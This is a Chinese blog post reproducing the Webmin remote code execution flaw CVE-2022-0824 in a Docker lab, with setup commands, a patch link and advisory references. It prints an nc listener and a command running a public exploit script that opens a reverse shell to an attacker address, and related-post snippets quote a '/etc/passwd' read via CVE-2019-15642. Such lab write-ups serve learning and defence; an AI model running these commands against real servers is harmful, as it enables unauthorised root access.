Webmin 远程代码执行Getshell漏洞复现 编号:CVE-2022-0824

已于 2022-08-31 11:57:24 修改
阅读量2k 收藏 4
点赞数
分类专栏: 渗透测试 文章标签: 安全 web 安全漏洞
于 2022-08-31 11:56:53 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/heartsk/article/details/126621266
版权

前言:

  Webmin是功能最强大的基于Web的Unix系统管理工具。管理员通过浏览器访问Webmin的各种管理功能并完成相应的管理动作。Webmin让您能够在远程使用支持HTTPS (SSL 上的 HTTP)协议的 Web 浏览器通过 Web界面管理您的主机。
  Webmin是一个功能强大且灵活的基于 Web 的服务器管理控制面板,适用于类Unix系统。Webmin允许用户配置操作系统内部,例如用户、磁盘配额、服务或配置文件,以及修改和控制开源应用程序,例如Apache HTTPServer、PHP或MySQL。

编号

 CVE编号:CVE-2022-0824
 CNVD编号:CNVD-2022-17023
 CNNVD编号::CNNVD-202203-076

影响版本

危险等级:高 ( 8.8 HIGH )

POC/EXP:已公开

Webmin Webmin < Webmin Webmin1.990    //1.990版本之前均受影响

漏洞简介

  Webmin是Webmin社区的一套基于Web的用于类Unix操作系统中的系统管理工具。webmin1.990之前版本存在权限提升漏洞,该漏洞源于错误的程序对高级本地过程调用。攻击者可以利用该漏洞能够修改操作系统文件系统并以运行应用程序权限执行操作系统命令。

复现

1、搭建环境

 拉取漏洞镜像

docker pull vulfocus/webmin_cve-2022-0824:latest

请添加图片描述

 启动漏洞环境

docker run -itd -p 10000:10000 -d vulfocus/webmin_cve-2022-0824

请添加图片描述

访问映射地址127.0.0.1:10000
账户: root 密码: password
环境搭建成功

请添加图片描述

2、进行复现操作

 打开漏洞环境页面进行复现

target host: http://127.0.0.1:10000    //模拟目标站点
attacker host: 192.168.132.58    //攻击者

请添加图片描述

 监听端口4444,准备获取反弹shell

nc -lvp 4444

 将POC文件下载,并且执行利用脚本

python3 Webmin-revshell.py -t http://127.0.0.1:10000 -c root:password -LS 192.168.132.58:9090 -L 192.168.132.58 -P 4444

请添加图片描述

 成功执行命令并且获取root权限

请添加图片描述

解决方案

更新到最新版本 附带厂商补丁链接:
https://github.com/webmin/webmin/commit/39ea464f0c40b325decd6a5bfb7833fa4a142e38

POC

https://github.com/faisalfs10x/Webmin-CVE-2022-0824-revshell

相关信息:

https://huntr.dev/bounties/d0049a96-de90-4b1a-9111-94de1044f295/

https://nvd.nist.gov/vuln/detail/cve-2022-0824

https://www.cnvd.org.cn/flaw/show/CNVD-2022-17023

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0824

http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-202203-076

观世音_遮天实验室
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CVE-2019-15642:Webmin远程执行代码(已认证)
03-10
CVE-2019-15642 Webmin远程执行代码(已认证) python用法: python CVE-2019-15642.py https://xxx.xxx.xxx:10000 "cat /etc/passwd" Webmin的0x01泊坞窗 cd ~/vulhub/webmin/CVE-2019-15107 docker-compose up -...
CVE-2022-0824 Webmin 远程代码执行漏洞复现
热爱学习,喜欢折腾!
10-11 2211
Webmin是功能最强大的基于Web的Unix系统管理工具。管理员通过浏览器访问Webmin的各种管理功能并完成相应的管理动作。Webmin让您能够在远程使用支持HTTPS (SSL 上的 HTTP)协议的 Web 浏览器通过 Web界面管理您的主机。Webmin是一个功能强大且灵活的基于 Web 的服务器管理控制面板,适用于类Unix系统。Webmin允许用户配置操作系统内部,例如用户、磁盘配额、服务或配置文件,以及修改和控制开源应用程序,例如Apache HTTPServer、PHP或MySQL。
【网络安全漏洞挖掘之CVE漏洞复现
最新发布
anquan2233的博客
06-25 742
这个比 Shiro550、Shiro721 要增加一些东西,首先看 pom.xml 这个配置文件,因为漏洞是 shiro 1.0.0 版本的。Shiro 在路径控制的时候,未能对传入的 url 编码进行 decode 解码,导致攻击者可以绕过过滤器,访问被过滤的路径。的 bypass 方式也是合理的,可能一些其他特殊字符也是可以的,前提是对请求并不造成影响,像。继续往下走,判断 html 的目录与当前请求的目录是否相同,因为我们请求被拆分出来是。的匹配范围,这里之前我们设定的访问方式是。
Webmin 远程代码执行CVE-2022-0824漏洞搭建复现+攻击检测原理(流量分析)详细
m0_60884805的博客
09-19 3244
Webmin v1.984 中,影响文件管理器模块,任何没有文件管理器模块访问权限的经过身份验证的低权限用户都可以与文件管理器功能交互,例如从远程 URL 下载文件和更改文件权限 (chmod)。通过在文件管理器中链接这些功能,可以通过精心制作的 .cgi 文件实现远程代码执行
Vulfocus练习之Webmin远程代码执行(CVE-2022-0824
weixin_45701865的博客
12-13 888
Webmin 是一个基于 Web 的 Unix 系统管理界面。使用任何现代网络浏览器,您可以设置用户帐户、Apache、DNS、文件共享等等。在 1.990 之前的 GitHub 存储库 webmin/webmin 中对远程代码执行的访问控制不当。
CVE-2022-0824 Webmin 远程代码执行
weixin_45501486的博客
03-22 189
0x00 简介Apache Spark 是专为大规模数据处理而设计的快速通用的计算引擎。与 Hadoop 不同,Spark 和 Scala 能够紧密集成,其中的 Scala 可以像操作本地集合对象一样轻松地操作分布式数据集。spark除了能够提供交互式查询外,它还可以优化迭代工作负载。0x01 漏洞概述该漏洞是由于Apache Spark UI提供了通过配置选项spark.acls.enable...
wireshark抓包(Webmin 远程命令执行漏洞CVE-2019-15107))
10-12
wireshark抓包(Webmin 远程命令执行漏洞CVE-2019-15107))
better-authentic:Webmin Authentic 主题的改进版本
06-03
使主题完全支持所有Webmin/Usermin模块 尽可能美观、快速、轻便且易于使用 兼容所有平台,支持移动设备 ####特征 未经身份验证的用户登陆登录页面和用户成功登录时的邮件通知 桌面和移动版本前所未有的方便和...
CVE-2019-15107
05-23
CVE-2019-15107 Webmin(1.890-1.920)后门RCE漏洞的Python实现 基于针对相同漏洞利用的Metasploit模块( ) 漏洞利用大多是自动的。 请参阅./CVE-2019-15107.py --help以了解完整的开关范围 警告:此存储库中的...
phpnuke:PHP-Nuke-内容管理系统
05-09
从上游源代码安装到/ var / www / phpnuke 开箱即用的SSL支持。 MySQL的管理前端(侦听端口12322-使用SSL)。 Postfix MTA(绑定到本地主机)以允许发送电子邮件(例如,密码恢复)。 用于配置Apache2,PHP,...
【墨者学院】Webmin未经身份验证的远程代码执行
yoyoko_chan的博客
07-29 475
0x00 0x01  进入靶场,发现是个登录界面  搜索查找了这个漏洞的详情后,知道了该漏洞编号CVE-2019-15107,根据漏洞介绍,知道了该漏洞存在于密码重置页面中,该页面允许未经身份验证的用户通过简单的POST请求执行任意命令。  所以将其用BurpSuite抓包到重放模块。修改访问地址、Referer以及POST内容  查看可知根目录下存在key.txt,修改poc读出key即可 0x03  学到了新的cve,了解了一个新的poc。 ...
vulhub靶场Webmin(CVE-2019-15107)漏洞复现
weixin_45095113的博客
12-12 779
Webmin(CVE-2019-15107)漏洞复现
Webmin远程命令执行漏洞(CVE-2019-15107)复现
qq_24481913的博客
08-01 285
Webmin是目前功能最强大的基于Web的Unix系统管理工具。管理员通过浏览器访问Webmin的各种管理功能并完成相应的管理动作。据统计,互联网上大约有13w台机器使用Webmin。当用户开启Webmin密码重置功能后,攻击者可以通过发送POST请求在目标系统中执行任意命令,且无需身份验证。
webmin 远程代码漏洞复现
weixin_54584489的博客
12-20 2389
漏洞简介 webmin是一款强大的Unix系统管理工具,在其版本为1.882到1.920存在CVE-2019-15107漏洞,当版本为1.890时,工具在默认配置下易受漏洞的威胁,而在其它版本当用户关闭密码过期策略时,受漏洞威胁的概率较小,漏洞主要是起代码中引用‘qx/ /’方法,把密码字符串当作命令执行 漏洞环境搭建 Webmin 1.920 kali执行终端命令:wget https://sourceforge.net/projects/webadmin/files/webmin/1.920/w
Webmin未经身份验证的远程代码执行
qq_56150805的博客
03-24 173
Webmin是一个用于管理Unix/Linux系统的管理配置工具,具有Web页面。其找回密码页面存在一处未授权命令注入漏洞,攻击者可通过添加管道命令"|"的方式执行任意系统命令。漏洞编号CVE-2019-15107),攻击者利用该漏洞可提交特殊构造的POST请求达到远程代码执行的目的。
webmin远程命令执行漏洞(cve-2019-15107)深入分析
whatday的专栏
06-27 2199
漏洞描述 近日Webmin被发现存在一处远程命令执行漏洞,经过分析后,初步猜测其为一次后门植入事件。 Webmin是目前功能最强大的基于Web的Unix系统管理工具。管理员通过浏览器访问Webmin的各种管理功能并完成相应的管理动作。据统计,互联网上大约有13w台机器使用Webmin。当用户开启Webmin密码重置功能后,攻击者可以通过发送POST请求在目标系统中执行任意命令,且无需身份验证。 漏洞分析 首先分析msf给出的插件 根据插件,还原出poc如下: 当poc执行后,会向p.
网络安全之命令执行漏洞复现
youmaob的博客
06-23 454
Webmin 是功能最强大的基于 Web 的 Unix 系统管理工具。管理员通过浏览器访问 Webmin 的各种管理功能并完成相应的管理动作。在版本 1.997 之前的 Webmin 中存在一个任意命令注入漏洞,触发该漏洞需登录 Webmin
Webmin远程代码执行(CVE-2019-15642)
m0_65150886的博客
02-21 302
Webmin 1.920及之前版本中的rpc.cgi文件存在安全漏洞。攻击者可借助特制的对象名称利用该漏洞执行代码。账户密码:root/root。3.通过burp随便抓取一个页面的包,并修改请求内容,执行id命令。1.访问https://ip:port,出现如下页面,开始实验。5.构造反弹shell命令,并对其进行url编码。Webmin是一套基于Web的用于类。2.输入账号密码,进行登录。
CVE-2022-36554
08-29
CVE-2022-36554是一个安全漏洞,根据提供的引用内容,我没有找到与该漏洞相关的具体信息。请提供更多关于CVE-2022-36554的细节,以便我能够为您提供更准确的答案。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [CVE-2022-33891POCApache Spark 命令注入(CVE-2022-33891)POC](https://download.csdn.net/download/qq_51577576/86396832)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] - *2* [CVE-2022-36446 Webmin命令注入漏洞复现](https://blog.csdn.net/qq_44281295/article/details/126345900)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] - *3* [CVE-2022-34265 &CVE-2019-14234 sql注入](https://blog.csdn.net/weixin_53090346/article/details/125760708)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值